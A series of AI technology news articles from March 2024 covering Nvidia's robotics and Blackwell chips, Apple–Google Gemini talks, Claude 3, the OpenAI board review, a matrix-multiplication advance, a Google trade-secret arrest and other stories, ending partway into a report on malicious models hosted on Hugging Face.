machine learning

Nvidia announces “moonshot” to create embodied human-level AI in robot form

Here come the robots —

As companies race to pair AI with general-purpose humanoid robots, Nvidia’s GR00T emerges.

An illustration of a humanoid robot created by Nvidia.

Nvidia

In sci-fi films, the rise of humanlike artificial intelligence often comes hand in hand with a physical platform, such as an android or robot. While the most advanced AI language models so far seem mostly like disembodied voices echoing from an anonymous data center, they might not remain that way for long. Companies such as Google, Figure, Microsoft, Tesla, and Boston Dynamics are working toward giving AI models a body. This is called “embodiment,” and AI chipmaker Nvidia wants to accelerate the process.

“Building foundation models for general humanoid robots is one of the most exciting problems to solve in AI today,” said Nvidia CEO Jensen Huang in a statement. Huang spent a portion of Nvidia’s annual GTC conference keynote on Monday going over Nvidia’s robotics efforts. “The next generation of robotics will likely be humanoid robotics,” Huang said. “We now have the necessary technology to imagine generalized human robotics.”

To that end, Nvidia announced Project GR00T, a general-purpose foundation model for humanoid robots. As a type of AI model itself, Nvidia hopes GR00T (which stands for “Generalist Robot 00 Technology” but sounds a lot like a famous Marvel character) will serve as an AI mind for robots, enabling them to learn skills and solve various tasks on the fly. In a tweet, Nvidia researcher Linxi “Jim” Fan called the project “our moonshot to solve embodied AGI in the physical world.”

AGI, or artificial general intelligence, is a poorly defined term that usually refers to hypothetical human-level AI (or beyond) that can learn any task a human could without specialized training. Given a capable enough humanoid body driven by AGI, one could imagine fully autonomous robotic assistants or workers. Of course, some experts think that true AGI is a long way off, so it’s possible that Nvidia’s goal is more aspirational than realistic. But that’s also what makes Nvidia’s plan a moonshot.

NVIDIA Robotics: A Journey From AVs to Humanoids.

“The GR00T model will enable a robot to understand multimodal instructions, such as language, video, and demonstration, and perform a variety of useful tasks,” wrote Fan on X. “We are collaborating with many leading humanoid companies around the world, so that GR00T may transfer across embodiments and help the ecosystem thrive.” We reached out to Nvidia researchers, including Fan, for comment but did not hear back by press time.

Nvidia is designing GR00T to understand natural language and emulate human movements, potentially allowing robots to learn coordination, dexterity, and other skills necessary for navigating and interacting with the real world like a person. And as it turns out, Nvidia says that making robots shaped like humans might be the key to creating functional robot assistants.

The humanoid key

Robotics startup Figure, an Nvidia partner, recently showed off its humanoid “Figure 01” robot.

Figure

So far, we’ve seen plenty of robotics platforms that aren’t human-shaped, including robot vacuum cleaners, autonomous weed pullers, industrial units used in automobile manufacturing, and even research arms that can fold laundry. So why focus on imitating the human form? “In a way, human robotics is likely easier,” said Huang in his GTC keynote. “And the reason for that is because we have a lot more imitation training data that we can provide robots, because we are constructed in a very similar way.”

That means that researchers can feed samples of training data captured from human movement into AI models that control robot movement, teaching them how to better move and balance themselves. Also, humanoid robots are particularly convenient because they can fit anywhere a person can, and we’ve designed a world of physical objects and interfaces (such as tools, furniture, stairs, and appliances) to be used or manipulated by the human form.

Along with GR00T, Nvidia also debuted a new computer platform called Jetson Thor, built around Nvidia’s Thor system-on-a-chip (SoC), part of the new Blackwell GPU architecture, which the company hopes will power this new generation of humanoid robots. The SoC reportedly includes a transformer engine capable of 800 teraflops of 8-bit floating-point AI computation for running models like GR00T.

Nvidia unveils Blackwell B200, the “world’s most powerful chip” designed for AI

There’s no knowing where we’re rowing —

208B transistor chip can reportedly reduce AI cost and energy consumption by up to 25x.

The GB200 “superchip” covered with a fanciful blue explosion.

Nvidia / Benj Edwards

On Monday, Nvidia unveiled the Blackwell B200 tensor core chip—the company’s most powerful single-chip GPU, with 208 billion transistors—which Nvidia claims can reduce AI inference operating costs (such as running ChatGPT) and energy consumption by up to 25 times compared to the H100. The company also unveiled the GB200, a “superchip” that combines two B200 chips and a Grace CPU for even more performance.

The news came as part of Nvidia’s annual GTC conference, which is taking place this week at the San Jose Convention Center. Nvidia CEO Jensen Huang delivered the keynote Monday afternoon. “We need bigger GPUs,” Huang said during his keynote. The Blackwell platform will allow the training of trillion-parameter AI models that will make today’s generative AI models look rudimentary in comparison, he said. For reference, OpenAI’s GPT-3, launched in 2020, included 175 billion parameters. Parameter count is a rough indicator of AI model complexity.

Nvidia named the Blackwell architecture after David Harold Blackwell, a mathematician who specialized in game theory and statistics and was the first Black scholar inducted into the National Academy of Sciences. The platform introduces six technologies for accelerated computing, including a second-generation Transformer Engine, fifth-generation NVLink, RAS Engine, secure AI capabilities, and a decompression engine for accelerated database queries.

Press photo of the Grace Blackwell GB200 chip, which combines two B200 GPUs with a Grace CPU into one chip.

Several major organizations, such as Amazon Web Services, Dell Technologies, Google, Meta, Microsoft, OpenAI, Oracle, Tesla, and xAI, are expected to adopt the Blackwell platform, and Nvidia’s press release is replete with canned quotes from tech CEOs (key Nvidia customers) like Mark Zuckerberg and Sam Altman praising the platform.

GPUs, once designed only for gaming acceleration, are especially well suited for AI tasks because their massively parallel architecture accelerates the immense number of matrix multiplication operations necessary to run today’s neural networks. With the dawn of new deep learning architectures in the 2010s, Nvidia found itself in an ideal position to capitalize on the AI revolution and began designing specialized GPUs just for the task of accelerating AI models.

Nvidia’s data center focus has made the company wildly rich and valuable, and these new chips continue the trend. Nvidia’s gaming GPU revenue ($2.9 billion in the last quarter) is dwarfed by its data center revenue ($18.4 billion), and that shows no signs of stopping.

A beast within a beast

Press photo of the Nvidia GB200 NVL72 data center computer system.

The aforementioned Grace Blackwell GB200 chip arrives as a key part of the new NVIDIA GB200 NVL72, a multi-node, liquid-cooled data center computer system designed specifically for AI training and inference tasks. It combines 36 GB200s (that’s 72 B200 GPUs and 36 Grace CPUs total), interconnected by fifth-generation NVLink, which links chips together to multiply performance.

A specification chart for the Nvidia GB200 NVL72 system.

“The GB200 NVL72 provides up to a 30x performance increase compared to the same number of NVIDIA H100 Tensor Core GPUs for LLM inference workloads and reduces cost and energy consumption by up to 25x,” Nvidia said.

That kind of speed-up could potentially save money and time while running today’s AI models, but it will also allow for more complex AI models to be built. Generative AI models—like the kind that power Google Gemini and AI image generators—are famously computationally hungry. Shortages of compute power have widely been cited as holding back progress and research in the AI field, and the search for more compute has led to figures like OpenAI CEO Sam Altman trying to broker deals to create new chip foundries.

While Nvidia’s claims about the Blackwell platform’s capabilities are significant, it’s worth noting that its real-world performance and adoption of the technology remain to be seen as organizations begin to implement and utilize the platform themselves. Competitors like Intel and AMD are also looking to grab a piece of Nvidia’s AI pie.

Nvidia says that Blackwell-based products will be available from various partners starting later this year.

Apple may hire Google to power new iPhone AI features using Gemini—report

Bake a cake as fast as you can —

With Apple’s own AI tech lagging behind, the firm looks for a fallback solution.

Benj Edwards

On Monday, Bloomberg reported that Apple is in talks to license Google’s Gemini model to power AI features like Siri in a future iPhone software update coming later in 2024, according to people familiar with the situation. Apple has also reportedly conducted similar talks with ChatGPT maker OpenAI.

The potential integration of Google Gemini into iOS 18 could bring a range of new cloud-based (off-device) AI-powered features to Apple’s smartphone, including image creation or essay writing based on simple prompts. However, the terms and branding of the agreement have not yet been finalized, and the implementation details remain unclear. The companies are unlikely to announce any deal until Apple’s annual Worldwide Developers Conference in June.

Gemini could also bring new capabilities to Apple’s widely criticized voice assistant, Siri, which trails newer AI assistants powered by large language models (LLMs) in understanding and responding to complex questions. Rumors of Apple’s own internal frustration with Siri—and potential remedies—have been kicking around for some time. In January, 9to5Mac revealed that Apple had been conducting tests with a beta version of iOS 17.4 that used OpenAI’s ChatGPT API to power Siri.

As we have previously reported, Apple has also been developing its own AI models, including a large language model codenamed Ajax and a basic chatbot called Apple GPT. However, the company’s LLM technology is said to lag behind that of its competitors, making a partnership with Google or another AI provider a more attractive option.

Google launched Gemini, a language-based AI assistant similar to ChatGPT, in December and has updated it several times since. Many industry experts consider the larger Gemini models to be roughly as capable as OpenAI’s GPT-4 Turbo, which powers the subscription versions of ChatGPT. Until just recently, with the emergence of Gemini Ultra and Claude 3, OpenAI’s top model held a fairly wide lead in perceived LLM capability.

The potential partnership between Apple and Google could significantly impact the AI industry, as Apple’s platform represents more than 2 billion active devices worldwide. If the agreement gets finalized, it would build upon the existing search partnership between the two companies, which has seen Google pay Apple billions of dollars annually to make its search engine the default option on iPhones and other Apple devices.

However, Bloomberg reports that the potential partnership between Apple and Google is likely to draw scrutiny from regulators, as the companies’ current search deal is already the subject of a lawsuit by the US Department of Justice. The European Union is also pressuring Apple to make it easier for consumers to change their default search engine away from Google.

With so much potential money on the line, selecting Google for Apple’s cloud AI job could potentially be a major loss for OpenAI in terms of bringing its technology widely into the mainstream—with a market representing billions of users. Even so, any deal with Google or OpenAI may be a temporary fix until Apple can get its own LLM-based AI technology up to speed.

Raspberry Pi-powered AI bike light detects cars, alerts bikers to bad drivers

Group ride —

Data from multiple Copilot devices could be used for road safety improvements.

Copilot mounted to the rear of a road bike

Velo AI

Whether or not autonomous vehicles ever work out, the effort put into using small cameras and machine-learning algorithms to detect cars could pay off big for an unexpected group: cyclists.

Velo AI is a firm cofounded by Clark Haynes and Micol Marchetti-Bowick, both PhDs with backgrounds in robotics, movement prediction, and Uber’s (since sold-off) autonomous vehicle work. Copilot, which started as a “pandemic passion project” for Haynes, is essentially car-focused artificial intelligence and machine learning stuffed into a Raspberry Pi Compute Module 4 and boxed up in a bike-friendly size and shape.

A look into the computer vision of the Copilot.

While car-detecting devices exist for bikes, including the Garmin Varia, they’re largely radar-based. That means they can’t distinguish between vehicles of different sizes and only know that something is approaching you, not, for example, how much space it will allow when passing.

Copilot purports to do a lot more:

  • Identify cars, bikes, and pedestrians
  • Alert riders audibly about cars “Following,” “Approaching,” and “Overtaking”
  • Issue visual warning to drivers who are approaching too close or too fast
  • Send visual notifications and a simplified rear road view to an optional paired smartphone
  • Record 1080p video and tag “close calls” and “incidents” from your phone

At 330 grams, with five hours of optimal battery life (and USB-C recharging), it’s not for the aero-obsessed or the super-long-distance rider. And at $400, it might not speak to the most casual and infrequent cyclist. But it’s an intriguing piece of kit, especially for those who already have, or have considered, a Garmin or similar action camera for watching their back. What if a camera could do more than just show you the car after you’re already endangered by it?

Copilot’s computer vision can alert riders to cars that are “Following,” “Approaching,” and “Overtaking.”

Velo AI

The Velo team detailed some of their building process for the official Raspberry Pi blog. The Compute Module 4 powers the core system and lights, while a custom Hailo AI co-processor helps with the neural networks and computer vision. An Arducam camera provides the vision and recording.

Beyond individual safety, the Velo AI team hopes that data from Copilots can feed into larger-scale road safety improvements. The team told the Pi blog that they’re starting a partnership with Pittsburgh, seeding Copilots to regular bike commuters and analyzing the aggregate data for potential infrastructure upgrades.

The Copilot is available for sale now and shipping, according to Velo AI. A December 2023 pre-order sold out.

Image-scraping Midjourney bans rival AI firm for scraping images

Irony lives —

Midjourney pins blame for 24-hour outage on “bot-net like” activity from Stability AI employee.

A burglar with a flashlight and papers in a business office. Exactly like scraping files from Discord.

On Wednesday, Midjourney banned all employees from image synthesis rival Stability AI from its service indefinitely after it detected “botnet-like” activity suspected to be a Stability employee attempting to scrape prompt and image pairs in bulk. Midjourney advocate Nick St. Pierre tweeted about the announcement, which came via Midjourney’s official Discord channel.

Prompts are the written instructions (like “a cat in a car holding a can of beer”) used by generative AI models such as Midjourney and Stability AI’s Stable Diffusion 3 (SD3) to synthesize images. Having prompt and image pairs could potentially help with the training or fine-tuning of a rival AI image generator model.

Bot activity that took place around midnight on March 2 caused a 24-hour outage for the commercial image generator service. Midjourney linked several paid accounts to a Stability AI data team employee trying to “grab prompt and image pairs.” Midjourney then decided to ban all Stability AI employees from the service indefinitely. It also announced a new policy: “aggressive automation or taking down the service results in banning all employees of the responsible company.”

A screenshot of the “Midjourney Office Hours” notes posted on March 6, 2024.

Midjourney

Siobhan Ball of The Mary Sue found it ironic that a company like Midjourney, which built its AI image synthesis models using training data scraped off the Internet without seeking permission, would be sensitive about having its own material scraped. “It turns out that generative AI companies don’t like it when you steal, sorry, scrape, images from them. Cue the world’s smallest violin.”

Users of Midjourney pay a monthly subscription fee to access an AI image generator that turns written prompts into lush computer-synthesized images. The bot that makes them was trained on millions of artistic works created by humans—a practice many artists have criticized as disrespectful. “Words can’t describe how dehumanizing it is to see my name used 20,000+ times in MidJourney,” wrote artist Jingna Zhang in a recent viral tweet. “My life’s work and who I am—reduced to meaningless fodder for a commercial image slot machine.”

Stability responds

Shortly after the news of the ban emerged, Stability AI CEO Emad Mostaque said that he was looking into it and claimed that whatever happened was not intentional. He also said it would be great if Midjourney reached out to him directly. In a reply on X, Midjourney CEO David Holz wrote, “sent you some information to help with your internal investigation.”

In a text message exchange with Ars Technica, Mostaque said, “We checked and there were no images scraped there, there was a bot run by a team member that was collecting prompts for a personal project though. We aren’t sure how that would cause a gallery site outage but are sorry if it did, Midjourney is great.”

Besides, Mostaque says, his company doesn’t need Midjourney’s data anyway. “We have been using synthetic & other data given SD3 outperforms all other models,” he wrote on X. In conversation with Ars, Mostaque similarly wanted to contrast his company’s data collection techniques with those of his rival. “We only scrape stuff that has proper robots.txt and is permissive,” Mostaque says. “And also did full opt-out for [Stable Diffusion 3] and Stable Cascade leveraging work Spawning did.”

When asked about Stability’s relationship with Midjourney these days, Mostaque played down the rivalry. “No real overlap, we get on fine though,” he told Ars and emphasized a key link in their histories. “I funded Midjourney to get [them] off the ground with a cash grant to cover [Nvidia] A100s for the beta.”

OpenAI CEO Altman wasn’t fired because of scary new tech, just internal politics

Adventures in optics —

As Altman cements power, OpenAI announces three new board members—and a returning one.

OpenAI CEO Sam Altman speaks during the OpenAI DevDay event on November 6, 2023, in San Francisco.

On Friday afternoon Pacific Time, OpenAI announced the appointment of three new members to the company’s board of directors and released the results of an independent review of the events surrounding CEO Sam Altman’s surprise firing last November. The current board expressed its confidence in the leadership of Altman and President Greg Brockman, and Altman is rejoining the board.

The newly appointed board members are Dr. Sue Desmond-Hellmann, former CEO of the Bill and Melinda Gates Foundation; Nicole Seligman, former EVP and global general counsel of Sony; and Fidji Simo, CEO and chair of Instacart. These additions notably bring three women to the board after OpenAI drew criticism last year over the composition of its restructured board.

The independent review, conducted by law firm WilmerHale, investigated the circumstances that led to Altman’s abrupt removal from the board and his termination as CEO on November 17, 2023. Despite rumors to the contrary, the board did not fire Altman because they got a peek at scary new AI technology and flinched. “WilmerHale… found that the prior Board’s decision did not arise out of concerns regarding product safety or security, the pace of development, OpenAI’s finances, or its statements to investors, customers, or business partners.”

Instead, the review determined that the prior board’s actions stemmed from a breakdown in trust between the board and Altman.

After reportedly interviewing dozens of people and reviewing over 30,000 documents, WilmerHale found that while the prior board acted within its purview, Altman’s termination was unwarranted. “WilmerHale found that the prior Board acted within its broad discretion to terminate Mr. Altman,” OpenAI wrote, “but also found that his conduct did not mandate removal.”

Additionally, the law firm found that the decision to fire Altman was made in undue haste: “The prior Board implemented its decision on an abridged timeframe, without advance notice to key stakeholders and without a full inquiry or an opportunity for Mr. Altman to address the prior Board’s concerns.”

Altman’s surprise firing occurred after he attempted to remove Helen Toner from OpenAI’s board due to disagreements over her criticism of OpenAI’s approach to AI safety and hype. Some board members saw his actions as deceptive and manipulative. After Altman returned to OpenAI, Toner resigned from the OpenAI board on November 29.

In a statement posted on X, Altman wrote, “i learned a lot from this experience. one think [sic] i’ll say now: when i believed a former board member was harming openai through some of their actions, i should have handled that situation with more grace and care. i apologize for this, and i wish i had done it differently.”

A tweet from Sam Altman posted on March 8, 2024.

Following the review’s findings, the Special Committee of the OpenAI Board recommended endorsing the November 21 decision to rehire Altman and Brockman. The board also announced several enhancements to its governance structure, including new corporate governance guidelines, a strengthened Conflict of Interest Policy, a whistleblower hotline, and additional board committees focused on advancing OpenAI’s mission.

After OpenAI’s announcements on Friday, resigned OpenAI board members Toner and Tasha McCauley released a joint statement on X. “Accountability is important in any company, but it is paramount when building a technology as potentially world-changing as AGI,” they wrote. “We hope the new board does its job in governing OpenAI and holding it accountable to the mission. As we told the investigators, deception, manipulation, and resistance to thorough oversight should be unacceptable.”

Matrix multiplication breakthrough could lead to faster, more efficient AI models

The Matrix Revolutions —

At the heart of AI, matrix math has just seen its biggest boost “in more than a decade.”

When you do math on a computer, you fly through a numerical tunnel like this—figuratively, of course.

Computer scientists have discovered a new way to multiply large matrices faster than ever before by eliminating a previously unknown inefficiency, reports Quanta Magazine. This could eventually accelerate AI models like ChatGPT, which rely heavily on matrix multiplication to function. The findings, presented in two recent papers, have led to what is reported to be the biggest improvement in matrix multiplication efficiency in over a decade.

Multiplying two rectangular number arrays, known as matrix multiplication, plays a crucial role in today’s AI models, including speech and image recognition, chatbots from every major vendor, AI image generators, and video synthesis models like Sora. Beyond AI, matrix math is so important to modern computing (think image processing and data compression) that even slight gains in efficiency could lead to computational and power savings.

Graphics processing units (GPUs) excel in handling matrix multiplication tasks because of their ability to process many calculations at once. They break down large matrix problems into smaller segments and solve them concurrently using an algorithm.

Perfecting that algorithm has been the key to breakthroughs in matrix multiplication efficiency over the past century—even before computers entered the picture. In October 2022, we covered a new technique discovered by a Google DeepMind AI model called AlphaTensor, focusing on practical algorithmic improvements for specific matrix sizes, such as 4×4 matrices.

By contrast, the new research, conducted by Ran Duan and Renfei Zhou of Tsinghua University, Hongxun Wu of the University of California, Berkeley, and by Virginia Vassilevska Williams, Yinzhan Xu, and Zixuan Xu of the Massachusetts Institute of Technology (in a second paper), seeks theoretical enhancements by aiming to lower the complexity exponent, ω, for a broad efficiency gain across all sizes of matrices. Instead of finding immediate, practical solutions like AlphaTensor, the new technique addresses foundational improvements that could transform the efficiency of matrix multiplication on a more general scale.

Approaching the ideal value

The traditional method for multiplying two n-by-n matrices requires n³ separate multiplications. However, the new technique, which improves upon the “laser method” introduced by Volker Strassen in 1986, has reduced the upper bound of the exponent (denoted as the aforementioned ω), bringing it closer to the ideal value of 2, the exponent that would correspond to the theoretical minimum number of operations (any algorithm must at least read the n² entries of each matrix).

The traditional way of multiplying two grids full of numbers could require doing the math up to 27 times for a grid that’s 3×3 (that is, n³ multiplications for an n×n grid). With these advancements, the number of required multiplication steps shrinks dramatically: the operation count now grows as roughly n raised to the power 2.371552 rather than n cubed. That’s a big deal because it edges closer to the theoretical ideal of n squared, the cost of merely reading every entry in the grids, which is the fastest we could ever hope to do it.
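
To make the counting concrete, here is a minimal Python sketch (our own illustration, not code from the papers) of the schoolbook algorithm; for two n×n matrices it performs exactly n × n × n scalar multiplications, the n³ baseline the new research chips away at.

def naive_matmul(a, b):
    """Multiply two n-by-n matrices the schoolbook way: n**3 scalar multiplications."""
    n = len(a)
    c = [[0] * n for _ in range(n)]
    for i in range(n):              # each row of the result...
        for j in range(n):          # ...and each column...
            for k in range(n):      # ...takes n multiply-adds
                c[i][j] += a[i][k] * b[k][j]
    return c

a = [[1, 2, 3], [4, 5, 6], [7, 8, 9]]
b = [[9, 8, 7], [6, 5, 4], [3, 2, 1]]
print(naive_matmul(a, b))           # 3 x 3 x 3 = 27 multiplications for a 3x3 grid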

Here’s a brief recap of events. In 2020, Josh Alman and Williams introduced a significant improvement in matrix multiplication efficiency by establishing a new upper bound for ω at approximately 2.3728596. In November 2023, Duan and Zhou revealed a method that addressed an inefficiency within the laser method, setting a new upper bound for ω at approximately 2.371866. The achievement marked the most substantial progress in the field since 2010. But just two months later, Williams and her team published a second paper that detailed optimizations that reduced the upper bound for ω to 2.371552.
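
For a rough sense of what those exponent changes mean, the sketch below (our own back-of-the-envelope illustration, not from either paper) plugs each bound into n^ω for a hypothetical 10,000×10,000 matrix. The numbers only track the exponents; the enormous constant factors hidden inside these "galactic" algorithms mean they are not practical speedups at real-world sizes.

# Back-of-the-envelope: how the bound n**omega shrinks as omega improves.
# Illustrative only; the constants hidden in these algorithms are enormous.
n = 10_000  # hypothetical matrix dimension

bounds = {
    "schoolbook (omega = 3)": 3.0,
    "Alman & Williams, 2020": 2.3728596,
    "Duan & Zhou, Nov. 2023": 2.371866,
    "Williams et al., 2024": 2.371552,
    "theoretical ideal": 2.0,
}

for name, omega in bounds.items():
    print(f"{name:26} ~ {n ** omega:.3e} operations")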

The 2023 breakthrough stemmed from the discovery of a “hidden loss” in the laser method, where useful blocks of data were unintentionally discarded. In the context of matrix multiplication, “blocks” refer to smaller segments that a large matrix is divided into for easier processing, and “block labeling” is the technique of categorizing these segments to identify which ones to keep and which to discard, optimizing the multiplication process for speed and efficiency. By modifying the way the laser method labels blocks, the researchers were able to reduce waste and improve efficiency significantly.

While the reduction of the omega constant might appear minor at first glance—reducing the 2020 record value by 0.0013076—the cumulative work of Duan, Zhou, and Williams represents the most substantial progress in the field observed since 2010.

“This is a major technical breakthrough,” said William Kuszmaul, a theoretical computer scientist at Harvard University, as quoted by Quanta Magazine. “It is the biggest improvement in matrix multiplication we’ve seen in more than a decade.”

While further progress is expected, there are limitations to the current approach. Researchers believe that understanding the problem more deeply will lead to the development of even better algorithms. As Zhou stated in the Quanta report, “People are still in the very early stages of understanding this age-old problem.”

So what are the practical applications? For AI models, a reduction in computational steps for matrix math could translate into faster training times and more efficient execution of tasks. It could enable more complex models to be trained more quickly, potentially leading to advancements in AI capabilities and the development of more sophisticated AI applications. Additionally, efficiency improvement could make AI technologies more accessible by lowering the computational power and energy consumption required for these tasks. That would also reduce AI’s environmental impact.

The exact impact on the speed of AI models depends on the specific architecture of the AI system and how heavily its tasks rely on matrix multiplication. Advancements in algorithmic efficiency often need to be coupled with hardware optimizations to fully realize potential speed gains. But still, as improvements in algorithmic techniques add up over time, AI will get faster.

US gov’t announces arrest of former Google engineer for alleged AI trade secret theft

Don’t trade the secrets dept. —

Linwei Ding faces four counts of trade secret theft, each with a potential 10-year prison term.

A Google sign stands in front of the building on the sidelines of the opening of the new Google Cloud data center in Hesse, Hanau, opened in October 2023.

On Wednesday, authorities arrested former Google software engineer Linwei Ding in Newark, California, on charges of stealing AI trade secrets from the company. The US Department of Justice alleges that Ding, a Chinese national, committed the theft while secretly working with two China-based companies.

According to the indictment, Ding, who was hired by Google in 2019 and had access to confidential information about the company’s data centers, began uploading hundreds of files into a personal Google Cloud account two years ago.

The trade secrets Ding allegedly copied contained “detailed information about the architecture and functionality of GPU and TPU chips and systems, the software that allows the chips to communicate and execute tasks, and the software that orchestrates thousands of chips into a supercomputer capable of executing at the cutting edge of machine learning and AI technology,” according to the indictment.

Shortly after the alleged theft began, Ding was offered the position of chief technology officer at an early-stage technology company in China that touted its use of AI technology. The company offered him a monthly salary of about $14,800, plus an annual bonus and company stock. Ding reportedly traveled to China, participated in investor meetings, and sought to raise capital for the company.

Investigators reviewed surveillance camera footage that showed another employee scanning Ding’s name badge at the entrance of the building where Ding worked at Google, making it appear that Ding was working from his office when he was actually traveling.

Ding also founded and served as the chief executive of a separate China-based startup company that aspired to train “large AI models powered by supercomputing chips,” according to the indictment. Prosecutors say Ding did not disclose either affiliation to Google, which described him as a junior employee. He resigned from Google on December 26 of last year.

The FBI served a search warrant at Ding’s home in January, seizing his electronic devices and later executing an additional warrant for the contents of his personal accounts. Authorities found more than 500 unique files of confidential information that Ding allegedly stole from Google. The indictment says that Ding copied the files into the Apple Notes application on his Google-issued Apple MacBook, then converted the Apple Notes into PDF files and uploaded them to an external account to evade detection.

“We have strict safeguards to prevent the theft of our confidential commercial information and trade secrets,” Google spokesperson José Castañeda told Ars Technica. “After an investigation, we found that this employee stole numerous documents, and we quickly referred the case to law enforcement. We are grateful to the FBI for helping protect our information and will continue cooperating with them closely.”

Attorney General Merrick Garland announced the case against the 38-year-old at an American Bar Association conference in San Francisco. Ding faces four counts of federal trade secret theft, each carrying a potential sentence of up to 10 years in prison.

Some teachers are now using ChatGPT to grade papers

robots in disguise —

New AI tools aim to help with grading, lesson plans—but may have serious drawbacks.

An elementary-school-aged child touching a robot hand.

In a notable shift toward sanctioned use of AI in schools, some educators in grades 3–12 are now using a ChatGPT-powered grading tool called Writable, reports Axios. The tool, acquired last summer by Houghton Mifflin Harcourt, is designed to streamline the grading process, potentially offering time-saving benefits for teachers. But is it a good idea to outsource critical feedback to a machine?

Writable lets teachers submit student essays for analysis by ChatGPT, which then provides commentary and observations on the work. The AI-generated feedback goes to the teacher for review before being passed on to students, so that a human remains in the loop.

“Make feedback more actionable with AI suggestions delivered to teachers as the writing happens,” Writable promises on its AI website. “Target specific areas for improvement with powerful, rubric-aligned comments, and save grading time with AI-generated draft scores.” The service also provides AI-written writing-prompt suggestions: “Input any topic and instantly receive unique prompts that engage students and are tailored to your classroom needs.”

Writable can reportedly help a teacher develop a curriculum, although we have not tried the functionality ourselves. “Once in Writable you can also use AI to create curriculum units based on any novel, generate essays, multi-section assignments, multiple-choice questions, and more, all with included answer keys,” the site claims.

The reliance on AI for grading will likely have drawbacks. Automated grading might encourage some educators to take shortcuts, diminishing the value of personalized feedback. Over time, the augmentation from AI may allow teachers to be less familiar with the material they are teaching. The use of cloud-based AI tools may have privacy implications for teachers and students. Also, ChatGPT isn’t a perfect analyst. It can get things wrong and potentially confabulate (make up) false information, possibly misinterpret a student’s work, or provide erroneous information in lesson plans.

Yet, as Axios reports, proponents assert that AI grading tools like Writable may free up valuable time for teachers, enabling them to focus on more creative and impactful teaching activities. The company selling Writable promotes it as a way to empower educators, supposedly offering them the flexibility to allocate more time to direct student interaction and personalized teaching. Of course, without an in-depth critical review, all claims should be taken with a huge grain of salt.

Amid these discussions, there’s a divide among parents regarding the use of AI in evaluating students’ academic performance. A recent poll of parents revealed mixed opinions, with nearly half of the respondents open to the idea of AI-assisted grading.

As the generative AI craze permeates every space, it’s no surprise that Writable isn’t the only AI-powered grading tool on the market. Others include Crowdmark, Gradescope, and EssayGrader. McGraw Hill is reportedly developing similar technology aimed at enhancing teacher assessment and feedback.

OpenAI clarifies the meaning of “open” in its name, responding to Musk lawsuit

The OpenAI logo as an opening to a red brick wall.

Benj Edwards / Getty Images

On Tuesday, OpenAI published a blog post titled “OpenAI and Elon Musk” in response to a lawsuit Musk filed last week. The ChatGPT maker shared several archived emails from Musk that suggest he once supported a pivot away from open source practices in the company’s quest to develop artificial general intelligence (AGI). The selected emails also imply that the “open” in “OpenAI” means that the ultimate result of its research into AGI should be open to everyone but not necessarily “open source” along the way.

In one telling exchange from January 2016 shared by the company, OpenAI Chief Scientist Ilya Sutskever wrote, “As we get closer to building AI, it will make sense to start being less open. The Open in openAI means that everyone should benefit from the fruits of AI after its built, but it’s totally OK to not share the science (even though sharing everything is definitely the right strategy in the short and possibly medium term for recruitment purposes).”

In response, Musk replied simply, “Yup.”

The AI wars heat up with Claude 3, claimed to have “near-human” abilities

The Anthropic Claude 3 logo.

On Monday, Anthropic released Claude 3, a family of three AI language models similar to those that power ChatGPT. Anthropic claims the models set new industry benchmarks across a range of cognitive tasks, even approaching “near-human” capability in some cases. It’s available now through Anthropic’s website, with the most powerful model being subscription-only. It’s also available via API for developers.

Claude 3’s three models represent increasing complexity and parameter count: Claude 3 Haiku, Claude 3 Sonnet, and Claude 3 Opus. Sonnet currently powers the free Claude.ai chatbot, which requires an email sign-in. But as mentioned above, Opus is only available through Anthropic’s web chat interface if you pay $20 a month for “Claude Pro,” a subscription service offered through the Anthropic website. All three feature a 200,000-token context window. (The context window is the number of tokens—fragments of a word—that an AI language model can process at once.)
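
For developers taking the API route, a minimal sketch along the following lines shows the general shape of a call (this assumes the anthropic Python package and the Opus model identifier Anthropic published at launch; check the current documentation before relying on either):

# Minimal sketch: asking Claude 3 Opus a question via Anthropic's Messages API.
# Assumes `pip install anthropic` and an ANTHROPIC_API_KEY environment variable;
# the model name below is the launch-era identifier and may change over time.
import anthropic

client = anthropic.Anthropic()  # picks up ANTHROPIC_API_KEY from the environment

message = client.messages.create(
    model="claude-3-opus-20240229",
    max_tokens=512,
    messages=[{"role": "user", "content": "Summarize the plot of Hamlet in two sentences."}],
)

print(message.content[0].text)  # the model's reply as plain text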

We covered the launch of Claude in March 2023 and Claude 2 in July that same year. Each time, Anthropic fell slightly behind OpenAI’s best models in capability while surpassing them in terms of context window length. With Claude 3, Anthropic has perhaps finally caught up with OpenAI’s released models in terms of performance, although there is no consensus among experts yet—and the presentation of AI benchmarks is notoriously prone to cherry-picking.

A Claude 3 benchmark chart provided by Anthropic.

Claude 3 reportedly demonstrates advanced performance across various cognitive tasks, including reasoning, expert knowledge, mathematics, and language fluency. (Despite the lack of consensus over whether large language models “know” or “reason,” the AI research community commonly uses those terms.) The company claims that the Opus model, the most capable of the three, exhibits “near-human levels of comprehension and fluency on complex tasks.”

That’s quite a heady claim and deserves to be parsed more carefully. It’s probably true that Opus is “near-human” on some specific benchmarks, but that doesn’t mean that Opus is a general intelligence like a human (consider that pocket calculators are superhuman at math). So, it’s a purposely eye-catching claim that can be watered down with qualifications.

According to Anthropic, Claude 3 Opus beats GPT-4 on 10 AI benchmarks, including MMLU (undergraduate level knowledge), GSM8K (grade school math), HumanEval (coding), and the colorfully named HellaSwag (common knowledge). Several of the wins are very narrow, such as 86.8 percent for Opus vs. 86.4 percent on a five-shot trial of MMLU, and some gaps are big, such as 84.9 percent on HumanEval over GPT-4’s 67.0 percent. But what that might mean, exactly, to you as a customer is difficult to say.

“As always, LLM benchmarks should be treated with a little bit of suspicion,” says AI researcher Simon Willison, who spoke with Ars about Claude 3. “How well a model performs on benchmarks doesn’t tell you much about how the model ‘feels’ to use. But this is still a huge deal—no other model has beaten GPT-4 on a range of widely used benchmarks like this.”

Hugging Face, the GitHub of AI, hosted code that backdoored user devices

IN A PICKLE —

Malicious submissions have been a fact of life for code repositories. AI is no different.

Photograph depicts a security scanner extracting a virus from a string of binary code.

Getty Images

Code uploaded to AI developer platform Hugging Face covertly installed backdoors and other types of malware on end-user machines, researchers from security firm JFrog said Thursday in a report that’s a likely harbinger of what’s to come.

In all, JFrog researchers said, they found roughly 100 submissions that performed hidden and unwanted actions when they were downloaded and loaded onto an end-user device. Most of the flagged machine learning models—all of which went undetected by Hugging Face—appeared to be benign proofs of concept uploaded by researchers or curious users. JFrog researchers said in an email that 10 of them were “truly malicious” in that they performed actions that actually compromised the users’ security when loaded.

Full control of user devices

